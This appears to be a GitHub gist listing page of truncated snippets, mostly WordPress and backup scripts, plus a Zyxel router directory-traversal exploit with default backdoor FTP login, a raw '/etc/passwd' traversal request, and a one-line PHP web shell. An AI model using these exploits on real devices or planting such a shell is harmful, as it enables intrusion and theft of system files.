This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Get user IP in WordPress | |
function get_the_user_ip() { | |
if ( ! empty( $_SERVER['HTTP_CLIENT_IP'] ) ) { | |
//check ip from share internet | |
$ip = $_SERVER['HTTP_CLIENT_IP']; | |
}else { | |
$ip = $_SERVER['REMOTE_ADDR']; | |
} | |
return apply_filters( 'wpb_get_ip', $ip ); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* Check if the given user agent string is one of a crawler, spider, or bot. | |
* | |
* @param string $user_agent | |
* A user agent string (e.g. Googlebot/2.1 (+http://www.google.com/bot.html)) | |
* | |
* @return bool | |
* TRUE if the user agent is a bot, FALSE if not. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
aynı dizinde bulunan bozuk türkçe karakterlerini düzeltir. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
BACKUP=/tmp/backup.$$ | |
NOW=$(date +"%Y-%m-%d") | |
FTPD="/yedek" | |
FTPS="SUNUCU" | |
FTPU="USER" | |
FTPP="PASS" | |
FTPPO="PORT" | |
DBS="dbname dbname2 mysql" | |
[ ! -d $BACKUP ] && mkdir -p $BACKUP || : |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Exploit Title: Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access < 5.13(AAXA.8)C0 | |
# Date: 2018-11-17 | |
# Exploit Author: numan türle @numanturle | |
# Vendor Homepage: https://www.zyxel.com/ | |
# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/ | |
# Tested on: macOS | |
# Fixed firmware: 5.13(AAXA.8)C0 | |
@modem_gateway = "192.168.1.1" // default address |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$ftp_server = "192.168.1.1"; // modem ip address | |
$ftp_conn = ftp_connect($ftp_server) or die("ftp server close"); | |
$login = ftp_login($ftp_conn, "support", "support"); // backdoor | |
$local_file = "crackme"; | |
$server_file = "/var/csamu"; // base64_encode files | |
if (ftp_get($ftp_conn, $local_file, $server_file, FTP_BINARY)) { | |
$open = file($local_file); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
add_action('add_attachment', 'rename_attachment'); | |
function rename_attachment($post_ID){ | |
$file = get_attached_file($post_ID); | |
$get_file_title = get_post($post_ID); | |
if($get_file_title->post_parent){ | |
$post_santize_title = sanitize_title(get_the_title($get_file_title->post_parent)); | |
$path = pathinfo($file); | |
$newfilename = $post_santize_title."-".$post_ID; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
# encoding=utf8 | |
import urllib.request | |
import urllib.error | |
import time | |
from multiprocessing import Pool | |
start = time.time() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Request | |
############################ | |
GET /../../../../../../../../../etc/passwd HTTP/1.1 | |
Host: 10.200.106.101 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | |
Accept-Encoding: gzip, deflate | |
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 | |
Connection: close | |
Response |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?=$_GET[z]($_GET[x]); |
OlderNewer